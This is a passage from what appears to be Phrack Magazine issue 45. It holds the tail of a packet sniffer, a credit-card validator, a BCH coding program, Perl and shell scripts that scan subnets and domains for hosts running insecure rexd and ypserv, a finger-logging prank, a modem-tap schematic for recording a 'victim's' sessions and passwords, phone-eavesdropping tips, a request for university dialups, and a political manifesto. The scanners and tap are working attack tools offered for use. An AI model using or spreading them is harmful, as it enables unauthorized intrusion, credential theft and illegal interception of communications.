  3855.         ifc.ifc_len = sizeof(cbuf);
  3856.         ifc.ifc_buf = cbuf;
  3857.         if(ioctl(s, SIOCGIFCONF, (char *)&ifc) < 0)
  3858.             Pexit(1,"Eth: ioctl");
  3859.  
  3860.         close(s);
  3861.         device = ifc.ifc_req->ifr_name;
  3862.     }
  3863.  
  3864.     fprintf(ERR,"Using logical device %s [%s]\n",device,NIT_DEV);
  3865.     fprintf(ERR,"Output to %s.%s%s",(LOG)?LogName:"stdout",
  3866.             (debug)?" (debug)":"",(backg)?" Backgrounding ":"\n");
  3867.  
  3868.     if(!LOG)
  3869.         LOG=stdout;
  3870.  
  3871.     signal(SIGINT, death);
  3872.     signal(SIGTERM,death);
  3873.     signal(SIGKILL,death);
  3874.     signal(SIGQUIT,death);
  3875.  
  3876.     if(backg && debug) {
  3877.          fprintf(ERR,"[Cannot bg with debug on]\n");
  3878.          backg=0;
  3879.     }
  3880.  
  3881.     if(backg) {
  3882.         register int s;
  3883.  
  3884.         if((s=fork())>0) {
  3885.            fprintf(ERR,"[pid %d]\n",s);
  3886.            exit(0);
  3887.         } else if(s<0)
  3888.            Pexit(1,"fork");
  3889.  
  3890.         if( (s=open("/dev/tty",O_RDWR))>0 ) {
  3891.                 ioctl(s,TIOCNOTTY,(char *)NULL);
  3892.                 close(s);
  3893.         }
  3894.     }
  3895.     fprintf(LOG,"\nLog started at => %s [pid %d]\n",NOWtm(),getpid());
  3896.     fflush(LOG);
  3897.  
  3898.     do_it();
  3899. }
  3900.  
  3901.  
  3902. ------------------------------------------------------------------------------
  3903.  
  3904. #! /bin/nawk -f
  3905. # validcc.awk - validate credit card #
  3906. {
  3907.  # validate CardNo
  3908.  number=""
  3909.  CardNo = $0
  3910.  for (indig = 1; indig <= length(CardNo); indig++) {
  3911.   dig = substr(CardNo, indig, 1)
  3912.   if (dig ~ /^[0-9]$/)
  3913.    number = number dig
  3914.   else if (dig != " ") {
  3915.    print "bad character in CardNo" | "cat >&2"
  3916.    break
  3917.   }
  3918.  }
  3919.  digit1 = substr(number, 1, 1)
  3920.  cclen = length(number)
  3921.  if (digit1 == "3") {
  3922.   print "Sorry, we do not take American Express" | "cat >&2"
  3923. #  if (cclen != 15)
  3924. #   print "wrong length for CardNo" | "cat >&2"
  3925.  } else if (digit1 == "4") { # visa
  3926.   if (cclen != 13 && cclen != 16)
  3927.    print "wrong length for CardNo" | "cat >&2"
  3928.  } else if (digit1 == "5") { # master card
  3929.   if (cclen != 16)
  3930.    print "wrong length for CardNo" | "cat >&2"
  3931.  } else
  3932.   print "unknown credit card" | "cat >&2"
  3933.  if (cclen == 13)
  3934.   bias = 0
  3935.  else
  3936.   bias = 1
  3937.  for (llen = 1; llen <= cclen; llen++) {
  3938.   cdigit = digit = substr(number, llen, 1)
  3939.   if (((llen-1+bias)%2) == 1) # double every second digit
  3940.    cdigit *= 2
  3941.   if (cdigit > 9)
  3942.    cdigit -= 9 # compensate ...
  3943.   csum += cdigit  # ... add up all the digits
  3944.  }
  3945.  if ((csum%10) != 0)
  3946.   print "bad CardNo" | "cat >&2"
  3947. }
  3948.  
  3949. ------------------------------------------------------------------------------
  3950.  
  3951. /* File: bch2.c
  3952.  
  3953.      ======  Encoder/Decoder of binary primitive BCH codes ======
  3954.  
  3955.      Robert Morelos-Zaragoza,     University of Hawaii     5/19/92
  3956.  
  3957.     This program computes the generator polynomial of the code by
  3958.     using cycle sets modulo n, n = 2^m - 1.
  3959.  
  3960.    (Part of this program is adapted from a Reed-Solomon encoder/decoder
  3961.     program, 'rs.c', for the binary case.    rs.c was created by Simon
  3962.     Rockliff, University of Adelaide   21/9/89)
  3963.  
  3964.    Main variables:
  3965.  
  3966.    m = order of the field GF(2**m)
  3967.    n = 2**m - 1 = length
  3968.    t = error correcting capability
  3969.    d = 2*t + 1 = designed minimum distance
  3970.    k = n - deg(g(x)) = dimension
  3971.  
  3972.    p[] = primitive polynomial to generate GF(2**m)
  3973.    (read from least to most significant coefficient)
  3974.  
  3975.    g[] = generator polynomial
  3976.  
  3977.    alpha_to [] = log table in GF(2**m)
  3978.    index_of[] = antilog table in GF(2**m)
  3979.    data[] = data polynomial
  3980.    bb[] = redundancy polynomial = x**(n-k) data[] modulo g[]
  3981.  
  3982.    numerr = number of errors
  3983.    errpos[] = error positions
  3984.  
  3985.    recd[] = received polynomial
  3986.    decerror = number of decoding errors ( in MESSAGE positions)
  3987.  
  3988. */
  3989.  
  3990. #include <math.h>
  3991. #include <stdio.h>
  3992.  
  3993. int m, n, k, t, d ;
  3994. int p [20] ; /* irreducible polynomial */
  3995. int alpha_to [1024], index_of [1024], g [1024] ;
  3996. int recd [1024], data [1024], bb [1024] ;
  3997. int numerr, errpos [1024], decerror = 0 ;
  3998. int seed;
  3999.  
  4000.  
  4001.  
  4002. void read_p()
  4003. /* Read primitive polynomial of degree m */
  4004.   {
  4005.  register int i;
  4006.  
  4007.     printf("Enter m and primitive polynomial p(x): ");  scanf("%d", &m);
  4008.     for (i=0; i<=m; i++)
  4009.         scanf("%d", &p[i]);
  4010.     printf("p(x) = ");
  4011.     for (i=0; i<=m; i++)
  4012.         printf("%1d", p[i]);
  4013.     printf("\n");
  4014.     n = (int)(pow(2.0,(double) m)) - 1;
  4015.  }
  4016.  
  4017.  
  4018.  
  4019. void generate_gf()
  4020. /* generate GF(2**m) from the irreducible polynomial p(X) in p[0]..p[m]
  4021.    lookup tables:  index->polynomial form   alpha_to[] contains j=alpha**i;
  4022.                    polynomial form -> index form  index_of[j=alpha**i] = i
  4023.    alpha=2 is the primitive element of GF(2**m)
  4024. */
  4025.  {
  4026.    register int i, mask ;
  4027.  
  4028.   mask = 1 ;
  4029.   alpha_to[m] = 0 ;
  4030.   for (i=0; i<m; i++)
  4031.    { alpha_to[i] = mask ;
  4032.      index_of[alpha_to[i]] = i ;
  4033.      if (p[i]!=0)
  4034.        alpha_to[m] ^= mask ;
  4035.      mask <<= 1 ;
  4036.    }
  4037.   index_of[alpha_to[m]] = m ;
  4038.   mask >>= 1 ;
  4039.   for (i=m+1; i<n; i++)
  4040.    { if (alpha_to[i-1] >= mask)
  4041.         alpha_to[i] = alpha_to[m] ^ ((alpha_to[i-1]^mask)<<1) ;
  4042.      else alpha_to[i] = alpha_to[i-1]<<1 ;
  4043.      index_of[alpha_to[i]] = i ;
  4044.    }
  4045.   index_of[0] = -1 ;
  4046.  }
  4047.  
  4048.  
  4049. void gen_poly()
  4050. /* Compute generator polynomial of BCH code of length n=2^m - 1 */
  4051.  {
  4052.     register int ii, jj, ll, kaux;
  4053.     int test, aux, nocycles, root, noterms, rdncy;
  4054.     int cycle[256][11], size[256], min[128], zeros[256];
  4055.  
  4056. /* Generate cycle sets modulo n, n = 2^m - 1 */
  4057.     cycle[0][0] = 0; size[0] = 1;
  4058.     cycle[1][0] = 1; size[1] = 1;
  4059.     jj = 1;    /* cycle set index */
  4060.     printf("Computing cycle sets modulo %d ...\n", n);
  4061.     do
  4062.       {
  4063.       /* Generate the jj-th cycle set */
  4064.       ii = 0;
  4065.       do
  4066.         {
  4067.         ii++;
  4068.         cycle[jj][ii] = (cycle[jj][ii-1]*2) % n;
  4069.         size[jj]++;
  4070.         aux = (cycle[jj][ii]*2) % n;
  4071.         } while ( aux != cycle[jj][0] );
  4072.       printf(" %d ", jj);
  4073.       if (jj && ( (jj % 10) == 0)) printf("\n");
  4074.       /* Next cycle set representative */
  4075.       ll = 0;
  4076.       do
  4077.         {
  4078.         ll++;
  4079.         test = 0;
  4080.         for (ii=1; ((ii<=jj) && (!test)); ii++)/* Examine previous cycle
  4081. sets */
  4082.           for (kaux=0; ((kaux<size[ii]) && (!test)); kaux++)
  4083.             if (ll == cycle[ii][kaux]) test = 1;
  4084.         } while ( (test) && (ll<(n-1)) );
  4085.       if (!(test))
  4086.         {
  4087.         jj++;   /* next cycle set index */
  4088.         cycle[jj][0] = ll;
  4089.         size[jj] = 1;
  4090.         }
  4091.       } while (ll < (n-1));
  4092.     printf(" ... Done\n");
  4093.     nocycles = jj; /* number of cycle sets modulo n */
  4094. #ifdef DEBUG
  4095.     printf("Cycle sets modulo %d:\n", n);
  4096.     for (ii=0; ii<=nocycles; ii++) {
  4097.       for (jj=0; jj<size[ii]; jj++)
  4098.         printf("%d ",cycle[ii][jj]);
  4099.       printf("\n"); }
  4100. #endif
  4101.  
  4102.     printf("Enter t: ");  scanf("%d", &t);
  4103.     d = 2*t+1;
  4104.     /* Search for roots 1, 2, ..., d-1 in cycle sets */
  4105.     kaux = 0;
  4106.     rdncy = 0;
  4107.     for (ii=1; ii<=nocycles; ii++)
  4108.       {
  4109.       min[kaux] = 0;
  4110.       for (jj=0; jj<size[ii]; jj++)
  4111.         for (root=1; root<d; root++)
  4112.           if (root == cycle[ii][jj])
  4113.             min[kaux] = ii;
  4114.       if (min[kaux])
  4115.         {
  4116.         rdncy += size[min[kaux]];
  4117.         kaux++;
  4118.         }
  4119.       }
  4120.     noterms = kaux;
  4121. #ifdef DEBUG
  4122. printf("roots: ", noterms);
  4123. #endif
  4124.     kaux = 1;
  4125.     for (ii=0; ii<noterms; ii++)
  4126.       for (jj=0; jj<size[min[ii]]; jj++)
  4127.         {
  4128.         zeros[kaux] = cycle[min[ii]][jj];
  4129. #ifdef DEBUG
  4130. printf("%d ", zeros[kaux]);
  4131. #endif
  4132.         kaux++;
  4133.         }
  4134.     k = n - rdncy;
  4135.     printf("This is a (%d, %d, %d) binary BCH code\n", n, k, d);
  4136.  
  4137.  
  4138. ------------------------------------------------------------------------------
  4139.  
  4140. #!/bin/perl -s
  4141. #
  4142. #   Scan a subnet for valid hosts; if given hostname, will look at the
  4143. # 255 possible hosts on that net.  Report if host is running rexd or
  4144. # ypserv.
  4145. #
  4146. #  Usage:  scan n.n.n.n
  4147.  
  4148. # mine, by default
  4149. $default = "130.80.26";
  4150.  
  4151. $| = 1;
  4152.  
  4153. if ($v) { $verbose = 1; }
  4154.  
  4155. if ($#ARGV == -1) { $root = $default; }
  4156. else { $root = $ARGV[0]; }
  4157.  
  4158. # ip address
  4159. if ($root !~ /[0-9]+\.[0-9]+\.[0-9]+/) {
  4160.         ($na, $ad, $ty, $le, @host_ip) = gethostbyname($root);
  4161.         ($one,$two,$three,$four) = unpack('C4',$host_ip[0]);
  4162.         $root = "$one.$two.$three";
  4163.         if ($root eq "..") { die "Can't figure out what to scan...\n"; }
  4164.         }
  4165.  
  4166. print "Subnet $root:\n" if $verbose;
  4167. for $i (01..255) {
  4168.         print "Trying $root.$i\t=> " if $verbose;
  4169.         &resolve("$root.$i");
  4170.         }
  4171.  
  4172. #
  4173. #  Do the work
  4174. #
  4175. sub resolve {
  4176.  
  4177. local($name) = @_;
  4178.  
  4179. # ip address
  4180. if ($name =~ /[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+/) {
  4181.         ($a,$b,$c,$d) = split(/\./, $name);
  4182.         @ip = ($a,$b,$c,$d);
  4183.         ($name) = gethostbyaddr(pack("C4", @ip), &AF_INET);
  4184.         }
  4185. else {
  4186.         ($name, $aliases, $type, $len, @ip) = gethostbyname($name);
  4187.         ($a,$b,$c,$d) = unpack('C4',$ip[0]);
  4188.         }
  4189.  
  4190. if ($name && @ip) {
  4191.         print "$a.$b.$c.$d\t$name\n";
  4192.         system("if ping $name 5 > /dev/null ; then\nif rpcinfo -u $name 100005 > /dev/null ; then showmount -e $name\nfi\nif rpcinfo -t $name 100017 > /dev/null ; then echo \"Running rexd.\"\nfi\nif rpcinfo -u $name 100004 > /dev/null ; then echo \"R
  4193. unning ypserv.\"\nfi\nfi");
  4194.         }
  4195. else { print "unable to resolve address\n" if $verbose; }
  4196.  
  4197. }
  4198.  
  4199. sub AF_INET {2;}
  4200.  
  4201.  
  4202. ------------------------------------------------------------------------------
  4203.  
  4204. #!/bin/sh
  4205. #rpc.chk 1.0
  4206. #
  4207. # Make sure you have got a newer version of Bourne Shell (SVR2 or newer)
  4208. # that supports functions. It's usually located in /bin/sh5 (under ULTRIX OS)
  4209. # or /bin/sh (Sun OS, RS/6000 etc) If it's located elsewhere, feel free to
  4210. # change the magic number, indicating the type of executable Bourne Shell.
  4211. #
  4212. # The script obtains via nslookup utility a list of hostnames from a nameserver
  4213. # and checks every entry of the list for active rexd procedures as well as
  4214. # ypserver procedures. The output is a list of the sites that run those
  4215. # daemons and are insecure.
  4216. # -yo.
  4217.  
  4218.  
  4219. domainname=$1
  4220. umask 022
  4221. PATH=/bin:/usr/bin:/usr/ucb:/usr/etc:/usr/local/bin ; export PATH
  4222.  
  4223. #
  4224. # Function collects a list of sites
  4225. # from a nameserver. Make sure you've got the nslookup utility.
  4226. #
  4227. get_list() {
  4228. (
  4229. echo set type=ns
  4230. echo $domainname
  4231. ) | nslookup | egrep "nameserv" | cut -d= -f2> .tmp$$  2>/dev/null
  4232. if [ ! -s .tmp$$ ]; then
  4233. echo "No such domain" >&2
  4234. echo "Nothing to scan" >&2
  4235. exit 1
  4236. fi
  4237. for serv in `cat .tmp$$`;do
  4238. (
  4239. echo server $serv
  4240. echo ls  $domainname
  4241. ) | nslookup > .file$$ 2>/dev/null
  4242. lines=`cat .file$$ | wc -l`
  4243. tail -`expr $lines  - 7` .file$$  | cut -d" " -f2 > .file.tmp # .file
  4244. sed -e "s/$/.$domainname/"  .file.tmp > .hosts$$
  4245. rm -rf .file* .tmp$$
  4246. sort .hosts$$ | uniq -q >> HOSTS$$; rm -rf .hosts$$
  4247. done
  4248. tr 'A-Z' 'a-z' <HOSTS$$ |sort|uniq -q > HOSTS.$domainname;rm -rf HOSTS$$
  4249. }
  4250.  
  4251. # Function
  4252.  
  4253. rpc_calls()
  4254. {
  4255. for entry in `cat HOSTS.$domainname`; do
  4256. (
  4257. rpcinfo -t $entry ypserv >/dev/null  && echo $entry runs YPSERV ||  exit 1 # Error!
  4258. ) >> .log  2>/dev/null
  4259. (
  4260. rpcinfo -t $entry rex >/dev/null && echo $entry runs REXD ||  exit 1 # Error !
  4261.  ) >> .log  2>/dev/null
  4262. done
  4263. }
  4264.  
  4265. # Main
  4266.  
  4267. if [ "$domainname" = '' ];  then
  4268. echo "Usage $0 domainname" >&2
  4269. exit 1
  4270. fi
  4271. get_list
  4272. echo "Checking $domainname domain" > .log
  4273. echo "*****************************" >> .log
  4274. echo "Totally `cat HOSTS.$domainname | wc -l` sites  to scan" >> .log
  4275. echo "******************************" >> .log
  4276. echo "started at `date`" >> .log
  4277. echo "******************************" >> .log
  4278. rpc_calls
  4279. echo "******************************" >> .log
  4280. echo "finished at `date`"  >> .log
  4281.  
  4282. ------------------------------------------------------------------------------
  4283.  
  4284.                          The Ultimate Finger/Mail Hack
  4285.  
  4286.                                       by
  4287.  
  4288.                                     Emanon
  4289.  
  4290.                               (a.k.a. WinterHawk)
  4291.  
  4292.  
  4293. This program will keep a log of who fingers you on your local host and tell
  4294. you when the finger was performed. As an added tease, it will send email to
  4295. the person doing the fingering telling them that you know who they are and
  4296. you know when they fingered you, even when you are not logged on.
  4297.  
  4298. Easy to follow steps:
  4299.  
  4300. [This is a comment]
  4301.  
  4302. [ALL OF THE FOLLOWING FILES ARE TO GO IN YOUR HOME DIRECTORY!!!]
  4303.  
  4304. [Get to your home directory]
  4305. % cd
  4306.  
  4307. [Make a file called .mailscript and include the following source code]
  4308. [MAKE THE APPROPRIATE CHANGES TO PATH NAMES WHERE NECESSARY!!!]
  4309. % cat .mailscript
  4310. #!bin/sh
  4311. MYNAME=your_account_name # JUST YOUR LOCAL ACCOUNT NAME, NOT THE FULL ADDRESS!!!
  4312. HOME=/your/full/home/path/goes/here
  4313. SUCKER=`ps -fau | grep 'finger $MYNAME' | grep -v 'grep' | awk '{print $1}'`
  4314. echo "$SUCKER fingered you on `date`" | cat >> $HOME/.fingerlog
  4315. echo "$MYNAME knows that you fingered him on `date`" | mail -s 'Sucker!' $SUCKER
  4316.  
  4317. [On some systems, the `u' flag is not necessary for the `ps' command]
  4318. [On most systems, you will not have to (re)declare the $HOME variable]
  4319. [If you do not want the fingerer to receive email, remove the last line]
  4320. [You may wish to hard code your account name, rather than using the variable]
  4321.  
  4322. [Make a file called fingerLog.c and include the following source code]
  4323. [MAKE THE APPROPRIATE CHANGES TO PATH NAMES WHERE NECESSARY!!!]
  4324. % cat fingerLog.c
  4325. #include <stdio.h>
  4326. #include <sys/file.h>
  4327. main()
  4328. {
  4329.    int x, pipeHandle, planHandle;
  4330.    char * pipeFile = "/your/full/home/path/goes/here/.plan";
  4331.    char * planFile = "/your/full/home/path/goes/here/.realplan";
  4332.    char buf[1024];
  4333.    for(;;){
  4334.       pipeHandle=open(pipeFile,O_WRONLY);
  4335.       planHandle=open(planFile,O_RDONLY);
  4336.       while((x=read(planHandle,buf,sizeof(buf)))>0)
  4337.          write(pipeHandle,buf,x);
  4338.       system("sh /your/full/home/path/goes/here/.mailscript");
  4339.       close(pipeHandle);
  4340.       close(planHandle);
  4341.       sleep(3);}
  4342. }
  4343.  
  4344. [Compile the fingerLog.c program]
  4345. % cc fingerLog.c -o fingerLog
  4346.  
  4347. [You may want to use a more inconspicuous name for the executable file]
  4348.  
  4349. [Move you .plan file to .realplan]
  4350. % mv .plan .realplan
  4351.  
  4352. [Make a piped FIFO .plan file]
  4353. % mknod .plan p
  4354.  
  4355. [Allow people to view your bogus .plan file]
  4356. % chmod 755 .plan
  4357.  
  4358. [Run fingerLog in the background]
  4359. % nohup fingerLog > /dev/null &
  4360.  
  4361. [Optional clean up]
  4362. % rm fingerLog.c
  4363.  
  4364. PROBLEMS: On some machines, the [ps -fau] option will not reveal what account
  4365.           a person is actually fingering. In this case, you can remove all
  4366.           instances of the $MYNAME variable from the [.mailscript] file.
  4367.           However, it is entirely possible that two people may be performing a
  4368.           finger at the same time and the script may log the wrong one. If you
  4369.           do have to omit the $MYNAME variable, I strongly suggest that you
  4370.           also remove the email option. And, you might as well change the [ps]
  4371.           command to a simple [w], like so:
  4372.  
  4373.           SUCKER=`w | grep 'finger' | grep -v 'grep' | awk '{print $1}'`
  4374.  
  4375.           Also, if the system you are on is bogged down with a lot of
  4376.           processes, the script may not find the fingerer before the process
  4377.           is terminated, thus logging the time without an appropriate account
  4378.           name, and not sending the email. So far, there has only been one
  4379.           system where I could only use the program to log the times that I
  4380.           had been fingered, no account names and no email :(
  4381.  
  4382. That's It! Of course, this is not a perfect bug free program. It should run
  4383. all the time [even when you are not logged on] so you only need to run it
  4384. once. If it does quit for some reason [like when the sysop kills it], you can
  4385. simply restart it. For those of you privileged enough to be using Korn shell,
  4386. you can add the following code to your [.profile] that will check to see if
  4387. fingerLog is running whenever you log in. If it isn't, it will restart it for
  4388. you. I'm sure that this can be modified to work with Bourne and C shell (if it
  4389. doesn't already), but I'll leave that up to you.
  4390.  
  4391. ps x | grep 'fingerLog' | grep -v 'grep' > /dev/null
  4392. if (( $? != 0 )); then nohup fingerLog > /dev/null &
  4393. fi
  4394.  
  4395. Let me say this one more time so that there is no confusion, "This only works
  4396. on your LOCAL host!!!" People who finger you from a remote host will see your
  4397. [.realplan] file, just like everyone else, but they will *NOT* receive the
  4398. email. It will appear in your .fingerlog as an empty account name. If and when
  4399. someone does revise this to work with remote hosts (most likely using the
  4400. netstat command), please email me a copy at:
  4401.  
  4402. tdavis@garnet.acns.fsu.edu
  4403.  
  4404. As a matter of fact, there is a lot of room for improvement. If *ANYONE* makes
  4405. *ANY* revisions, please have the courtesy to email me a copy and explain what
  4406. changes you have made. Thanks. Enjoy!
  4407.  
  4408. Assembly: WinterHawk bows humbly to Cat and Fuzz.
  4409.  
  4410. ------------------------------------------------------------------------------
  4411.  
  4412.                      +----------------------+
  4413.                      | Building A Modem Tap |
  4414.                      | by: phigan           |
  4415.                      +----------------------+
  4416.  
  4417.         Many of you have probably heard of, seen, or maybe even built a
  4418. phone tap. Not a very difficult device to make. I got the idea of making
  4419. a modem tap from a computer underground book that I saw over at my local
  4420. Spy Headquarters (I'm not sure if this is a store that is only here in
  4421. 602 or not but its got shitloads of spy equipment such as video
  4422. surveillance, fake ids, useful literature, fake bombs, very small bugs,
  4423. etc.).  First of all, here is the schematic for making a phone tap to
  4424. record to cassette.
  4425.  
  4426. Parts
  4427. ~~~~~
  4428. 1) RCA-type jack
  4429.    to tape recorder
  4430.    mic input
  4431. 1) 10k(p)ohm : 20k(s) ohm
  4432.    transformer
  4433. 1) .005 mfd capacitor
  4434.  
  4435. Schematic
  4436. ~~~~~~~~~
  4437.                                       To line
  4438. +--------------------------+          |     |
  4439. |                          |          |     |
  4440. (+-----------+             |          |     |
  4441. RCA          | Transformer |          |     |
  4442. jack         +^^^^^^^^^^^^^+          |     |
  4443.              +-------------+          |     |
  4444.              |             |          |     |
  4445.              |             +----------------+
  4446.              |                        |     |
  4447.              +----------||------------+     |
  4448.                      .005 mfd         |     |
  4449.  
  4450.         The main purpose for a modem tap such as this is to set it up at
  4451. someone's house or maybe an office building that you know dials out with
  4452. modems and you can record all the keystrokes that have been entered.
  4453. With this next schematic, you can simply play the cassette back through
  4454. your modem and easily print out the entire session having logged
  4455. passwords and so on. Good way of getting CBI accounts also.
  4456.  
  4457. Parts
  4458. ~~~~~
  4459. 1) RCA type jack
  4460.    from tape recorder
  4461.    ext. speaker
  4462. 1) 100 Ohm restistor
  4463. 1) bell-type phone jack (@)
  4464.  
  4465. Schematic
  4466. ~~~~~~~~~
  4467.  
  4468.     +-------+       ____________________   RCA jack
  4469. ----| Modem | @----<_________/\/\/\_____>(+
  4470.     +-------+ phone          100 Ohm
  4471.               jack
  4472.  
  4473.         When you have a recording of your victim's session, simply fire
  4474. up your terminal program and treat it as you would any other modem
  4475. connection. If you are smart enough, you may even be able to combine
  4476. these two and make an acoustic modem module for a regular laptop modem
  4477. (hint hint payphones hint hint). I have seen this done in a mail-order
  4478. mag.
  4479. It said that the acoustic module could handle 9600 baud and if you have
  4480. good
  4481. enough rubber cups (like they did on their model) then you will
  4482. have absolutely no line noise. Anyway, if you have any problems, feel
  4483. free to email me at 15660@ef.gc.maricopa.edu or you may find me on IRC
  4484. as phigan on channels #phreak, #hack, or sometimes #c-64.
  4485.  
  4486.  
  4487.                       ,,,
  4488.                      (o o)
  4489. .---------------oOO---(_)---OOo---------------.
  4490. | PHiGAN/6o2              IBM/Amiga/8-Bit     |
  4491. | ANSi/VGA/Coding         Member: NWPAC       |
  4492. | Hi-Res/8-Bit/Musix      SysOp:              |
  4493. | 15660@ef.gc.maricopa.edu -The PhAcS Machine |
  4494. `---------------------------------------------'
  4495.  
  4496.  
  4497. ------------------------------------------------------------------------------
  4498.  
  4499.                   Phone Tapping with a personal stereo !!!
  4500.                              brought to you by
  4501.  
  4502.                                  Harlequin
  4503.  
  4504.         Here in the UK, we have a reasonably secure phone system, mainly
  4505. because the whole system is run by our beloved phone company British
  4506. Telecom, even the private phone companies have to rent their lines off BT.
  4507.  
  4508.         BUT, due to something or other I don't entirely understand here's
  4509. how to listen in to phone conversations with a personal stereo.
  4510.  
  4511.         I was lying in bed one night trying desperately to read my book,
  4512. while everyone else was making enough noise to wake the dead. So, I
  4513. thought, I'll put personal stereo radio onto some radio crackle to cut out
  4514. everything else. I was happily reading for a while when suddenly the radio
  4515. crackle was interrupted by 'ring ring, ring ring, 'ello Jon, going into
  4516. work tomorrow ? Good, how's the wife.... etc etc' Fuck me ! A telephone
  4517. conversation. After a bit of investigating I discovered my bed lies next
  4518. to where the telephone line goes thru the wall.
  4519.  
  4520.         What I did was to tune the radio into an AM frequency, as far to
  4521. the right (past 1600 kHz) as possible. This works on my personal stereo, a
  4522. Sharp, model JC-512(GY), my clock radio and my mates pocket radio, but not
  4523. on some other radios we've tried. It picks up local telephone calls (if
  4524. there are any strong enough to be picked up) when the radio is put near a
  4525. telephone socket or line (the closer the better). Computer monitors and
  4526. TV's give loads of interference (try putting your the radio near one when
  4527. tuned to listen for phones) so keep away from them.
  4528.  
  4529.         You can't choose what calls to listen in on, and some may be
  4530. blurred beyond recognition, while others are crystal clear. Also,
  4531. strangely enough if someone in the house uses the phone while your
  4532. listening to conversations it doesn't effect it in any way, and you can't
  4533. hear the call currently on the line.
  4534.  
  4535.         Not being an electronics hacker I can only assume it is to do with
  4536. the frequency of radio waves given off by electrical devices after a
  4537. certain distance travelled. But then again maybe not.
  4538.  
  4539.         This may work in other places apart from the UK as well, give it a
  4540. try !                         ==Phrack Magazine==
  4541.  
  4542.               Volume Five, Issue Forty-Five, File 6 of 28
  4543.  
  4544.  
  4545.                            //   //  /\   //   ====
  4546.                           //   //  //\\ //   ====
  4547.                          ==== //  //  \\/   ====
  4548.  
  4549.                      /\   //  // \\    //  /===   ====
  4550.                     //\\ //  //   //  //   \=\   ====
  4551.                    //  \\/    \\ //  //   ===/  ====
  4552.  
  4553.                                 PART III
  4554.  
  4555. ------------------------------------------------------------------------------
  4556.  
  4557. ** SUBMISSIONS WANTED ON THE FOLLOWING TOPICS FOR FUTURE ISSUES **
  4558.  
  4559. Cable Television Descrambling
  4560. PBX Data Terminal Files
  4561. Van Eck Eavesdroping
  4562. Security & Anti-Security Measures (Computers, Networks, Physical Sites)
  4563. Satellite Transmissions (Audio, Video, DATA, Telecommunications)
  4564. Amateur Radio & Television
  4565. Radio Modification Instructions
  4566. Electronics Project Schematics
  4567. X.25 Networking / X.29 Pad Control
  4568. Digital Cellular (GSM/TDMA/CDMA)
  4569. Wireless Data Networking (LAN, WAN)
  4570.  
  4571. ** REMEMBER:  Send your university dialups to phrack@well.com ASAP!  **
  4572.  
  4573. ------------------------------------------------------------------------------
  4574.  
  4575. A Declaration of the Complaints and Grievances of the United States
  4576. Electronic Community --
  4577.  
  4578.         "They that can give up essential liberty for a little temporary
  4579. safety deserve neither liberty nor safety!" These are Benjamin Franklin's
  4580. words for one of the most important values defining American Government in
  4581. it's infancy. This idea, that people should be given as much freedom as
  4582. possible, and also responsibility for what problems abuse of that freedom
  4583. might bring, is one of the most important differences between our so called
  4584. "Democracy," and a totalitarian despotism. In fact, this value is so
  4585. essential that if it is lost there will be no freedom in the United States
  4586. of America, and no so called "Democracy!" Despite this fact, every day more
  4587. and more of our freedoms, as citizens and residents of the United States of
  4588. America, are being eroded away in the name of safety for us and for our
  4589. government. This erosion of rights and freedoms has touched all areas of
  4590. our lives, from health care and economics, to criminal justice and national
  4591. defense. However, the most profound and dangerous erosion has been in the
  4592. area of technology. We believe this is as good a place as any to begin a
  4593. fight to save our country from continuing to travel down the road to
  4594. despotism. Do not forget that this is only a beginning.
  4595.         We, the people of the Electronic Community in the United States of
  4596. America, have been openly repressed and attacked by all branches and
  4597. divisions of the United States Government, in direct violation of our
  4598. natural rights and rights granted to us via social contract! The Electronic
  4599. Community is one of the world's greatest examples of the power of freedom
  4600. and democracy. Most of Cyberspace was not created by businesses looking for
  4601. profit, or by governments looking for more efficient control, but mainly by
  4602. ordinary citizens looking for a medium through which they could communicate
  4603. with others, and express their thoughts and ideas. The computerized
  4604. telecommunications used by the electronic community is a medium unlike any
  4605. that has ever existed. It is a decentralized, mostly uncensored, and public
  4606. forum for open discussion on a world wide basis. It provides ordinary
  4607. citizens with the ability to express their ideas to anyone willing to
  4608. listen, with no economic or social barriers and no prejudgments. It gives
  4609. everyone in the world access to all the knowledge and information the
  4610. world has to offer. It has continually shattered deeply ingrained social
  4611. prejudices concerning characteristics such as age, race, wealth, and sex.
  4612. In fact, it is common to find 14 year olds arguing philosophy with 41 year
  4613. olds on America's computer networks!
  4614.         However, instead of embracing this great tool of freedom, the
  4615. United States Government has reacted to it with fear and ignorance. They
  4616. have completely ignored the positive effects the existence of this resource
  4617. is already having on society. In fact, they have done little, if anything,
  4618. to even gain an understanding of the electronic community and it's
  4619. citizens. They have thought only of the damage that could be wrought if
  4620. access to this kind of knowledge and information fell into the "wrong
  4621. hands." They have labeled everyone in the electronic community a potential
  4622. criminal, and have cracked down on any kind of activity which has not met
  4623. their standards. In doing so they have crushed the free flow of ideas,
  4624. trampled on the constitution, and blatantly encroached upon the civil rights
  4625. of the people living and working on American's computer networks. They have
  4626. chosen safety above freedom, and in doing so they have threatened the
  4627. existence of one of the most important social developments of the twentieth
  4628. century...
  4629. They have ensued upon a Campaign of Terror, using fear to control and
  4630.         oppress the Electronic Community.
  4631. They have openly and blatantly violated local, state, and federal law, and
  4632.         internationally accepted standards for human rights.
  4633. They have used misinformation to set certain areas of the electronic
  4634.  community off against one another, or to label certain areas as
  4635.  criminal, while they have attacked the entire community without
  4636.  regard to action or position.
  4637. They have lied to the press, to themselves, and to the American people in
  4638.  order to keep their actions unquestioned.
  4639. They have imposed taxes and tariffs and have priced public utilities with
  4640.         the specific intent of effecting a chill upon the free flow of
  4641.         thoughts and ideas.
  4642. They have used technology to amass enormous amounts of information on
  4643.         innocent citizens in order to control and oppress them.
  4644. They have judged the interests of private industry to be more important than
  4645.  the interests of the general population.
  4646. They have attacked innocent citizens in order to increase the profits of
  4647.  certain industries.
  4648. They have declared themselves immune from the legal and moral standards
  4649.  they expect from the rest of society.
  4650. They have, on a regular basis, committed the very acts they have called
  4651.  criminal.
  4652. They have tried to criminalize personal privacy while belligerently
  4653.  defending the privacy of businesses and of government.
  4654. They have attempted to control the minds of the American people by
  4655.  criminalizing certain knowledge and information.
  4656. They have prevented the preparation of thoughts and ideas for public
  4657.         dissemination.
  4658. They have threatened innocent citizens with loss of their right to life,
  4659.         liberty, property, and the pursuit of happiness in order to control
  4660.         their thoughts, opinions, and actions.
  4661. They have repeatedly made laws and taken legal action in areas and/or
  4662.  concerning subjects of which they have little or no understanding.
  4663. They have seized, damaged, and destroyed the property of innocent citizens.
  4664. They have wrongly imprisoned citizens based on questionable information for
  4665.         actions which are negligible and, at worst, legally gray.
